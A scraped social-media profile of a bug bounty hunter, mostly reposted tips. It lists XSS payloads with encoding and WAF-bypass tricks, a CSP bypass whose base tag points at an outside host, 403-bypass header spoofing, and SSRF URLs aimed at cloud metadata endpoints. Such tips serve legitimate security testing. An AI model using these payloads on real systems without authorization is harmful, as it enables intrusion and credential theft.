@sapienshack Profile picture

Sapienshack

@sapienshack

Lead Application Security Analyst | Penetration Tester | Bug Bounty Hunter | Career Adviser | Security Researcher | Developer | Secure Code Review

Joined June 2021
Similar User
yanal abuseini photo

@_enigma146

7R!XxSec photo

@7RiXxSec

Pranav Patil photo

@0xcris_prp

Watch1ngU photo

@Watch1ngU

Rene Anto P photo

@_rzgami_

sh3llvik photo

@sh3llvik

Sapienshack Reposted

<!-- alert --> #HTML entities/encode: javascript:alert&lpar;&rpar; javascript:al&#x65;rt`` #url encoding: javascript:alert%60%60 javascript:x='%27-alert(1)-%27'; javascript:%61%6c%65%72%74%28%29 #JS unicode javascript:a\u006Cert``" javascript:\u0061\u006C\u0065\u0072\u0074``


Sometimes, People don’t really say what they are really 🧐


Sapienshack Reposted

Our Top 5 #XSS Vectors Main + Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm?.(1)//\ #XSS #GameChanger

Tweet Image 1

Sapienshack Reposted

To bypass 403 restrictions 1. Use patterns like in the URL path /* /%2f/ /./ / /*/ 2. Adding Headers in request with value 127.0.0.1 X-Custom-IP-Authorization X-Forwarded-For X-Remote-IP Forwarded-For X-Client-IP 3. Switch from GET to POST (or other methods) #CyberSecurity


Sapienshack Reposted

You're using Burp Collaborator wrong. Don't use Burp's default collaborator instance when testing for out of band vulnerabilities. Many companies use egress filtering & block outbound traffic to the default collaborator domain oastify.com It's worth setting up a…


Sapienshack Reposted

If you think these apps are good for #XSS testing... ❌ DVWA ❌ Altoro Mutual ❌ TestPHP VulnWeb ❌ Firing Range Sorry to say but we are in 2024! 😆 They are so old that some of their tests are meant for Internet Explorer 6 to 9! knoxss.me/?page_id=766 Update your #XSS game.


Sapienshack Reposted

Day 4/7 : SSRF Payload for Technologies: Oracle http://192.0.0.192/latest/ http://192.0.0.192/latest/user-data/ http://192.0.0.192/latest/meta-data http://192.0.0.192/latest/attributes/ Alibaba http://100.100.100.200/latest/meta-data/…


Sapienshack Reposted

Top 5 KNOXSS #XSS Vectors Main + Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm(1)?.(1)//\ #GameChanger


Sapienshack Reposted

Directory-brute forcing? You should NEVER filter based on status code. Paths can exist and return a 404. I’ve seen this so many times: /noexist/ -> 404 Not Found. /api/ -> 404 Not Found, but different response body (JSON formatted) /api/endpoint -> 200 OK Filter by…


XSS Validation bypass when application block "Parenthesis" " ><img onerror=alert`23` src=a> #bugbountytips #bugbountyconference #XSS #Security #waf


Sapienshack Reposted

An XSS JSON payload to bypass WAF, by @0x0SojalSec ["');alert('XSS');//"]@xyz.xxx


Sapienshack Reposted

For those who are new to bug bounty or those who haven’t found SSRF yet, you can use these tools to get your first SSRF bug 🎯💰 PS: Don’t completely relay on tools, do manual testing too🧑‍💻

Tweet Image 1

Sapienshack Reposted

An unbeatable 75% off for those ready to elevate their skills 🥳! ** Like, Comment, Re-share, and 1 lucky winner will get a 100% discount on our CMPen- Android exam!** 🔖Promo Code - CMPen-Android-75-OFF 🕵️‍♂️Tom's Static Analysis Adventure! Tom was knee-deep into an Android…

Tweet Image 1

Sapienshack Reposted

Nuclei scanner's power comes from fuzzing templates. The following repository have different templates for the scanner which can be used for finding unknown security vulnerabilities github.com/projectdiscove… #bugbountytips #bugbounty #CyberSecurity


United States Trends
Loading...

Something went wrong.


Something went wrong.